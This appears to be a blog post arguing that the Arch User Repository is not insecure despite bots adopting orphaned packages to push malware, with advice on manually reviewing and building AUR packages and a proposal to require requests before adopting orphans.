The Arch User Repository is not a problem
Anyone can make a package for the Arch User Repository and others can install it. There's no verification, otherwise it would be pointless, and you need to trust the person who packages it. You'll review the scripts and files and make sure it comes from a trusted source, and if the package updates you review the changes. Has the package added new dependencies that make no sense? Don't install it and question it or consult the mailing list or forums.
If someone wanted to put malware on the AUR they can make a new package and push the malware, but the package has no user base. Instead, they could take over orphan packages.
An orphan package is a package that has no maintainer, and anyone can adopt it and push updates. The past week a lot of accounts has adopted many orphaned packages just to add malicious code, but these packages are abandoned. They probably have a very small user base if any at all, and to get infected by the malware you need to install the package after the malware was pushed. Having the previous build installed doesn't mean you're infected.
Is the AUR insecure? Does the Arch Linux maintainers need to take the AUR down? Does the AUR need a verification process or does something else need to change? If the AUR is insecure, is it bad that there's malware? Yes, there are still rules. Is it bad that anyone can adopt an orphan package? Maybe, but who uses these orphan packages, and if you are, you should review the changes and let the staff know of the malicious activity.
To install a package for Arch Linux, you run a single command and it fetches it from the official repos. These are maintained by trusted users and the packages are signed. The AUR is unsupported and there are several steps1 that need to be taken to install one.
- Download the tarball (or git clone, which requires git to be installed).
- Extract it and enter the directory.
- Build the package with makepkg.
- Install it with pacman.
This is not an automated process. In theory you could automate it if you have git installed, but that is an elaborate process that can't be done accidentally. The list above is the required steps, you can't skip any, but before step 2 you should have also read the PKGBUILD and any other scripts to make sure you know what is being installed.
“But AUR helpers…” No. Don't use them. The steps above are the correct way to build and install an AUR package. There are AUR helpers which automate the process for you with a single command, and they are dangerous. Don't use them.
“But that's annoying.” Then switch to Ubuntu.
“But how do I get updates?” You subscribe to the email notifications. When new commits are pushed, you will get an email. Then you can review the changes.
“But the noobs!” Arch Linux is not for beginners. That doesn't mean you can't use it as a beginner, but you need to be able to read and follow instructions. The wiki page explains how to use the AUR.
“What about $archBasedDistro?” Don't use them. They often try and incorporate the AUR seamlessly so that you don't even understand that you are not installing packages from the official repos. Very dangerous!
The fact that a lot of orphan packages were taken over by bots to push malware is bad, but how can it be stopped? Currently, if you think the maintainer of a package has abandoned it but still owns it, you can request to take over it, but if the package is already orphan you can take it over immediately. Having to request to take over an orphan package would most likely have stopped this issue in the first place.
I have written about how to use the AUR in a previous blog post.↩